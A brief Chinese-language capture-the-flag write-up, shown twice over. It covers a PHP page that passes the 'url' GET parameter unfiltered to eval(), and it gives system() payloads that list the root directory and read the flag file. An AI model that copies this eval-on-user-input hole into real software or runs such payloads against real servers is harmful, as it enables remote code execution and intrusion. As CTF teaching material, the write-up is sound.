<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>
代码还是那么的朴实无华,我愿称之为真正的easy
没有做过滤,传入的url的值 直接当做php代码执行
payload
system('ls /');
system('cat /flllllaaaaaaggggggg');
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>
代码还是那么的朴实无华,我愿称之为真正的easy
没有做过滤,传入的url的值 直接当做php代码执行
payload
system('ls /');
system('cat /flllllaaaaaaggggggg');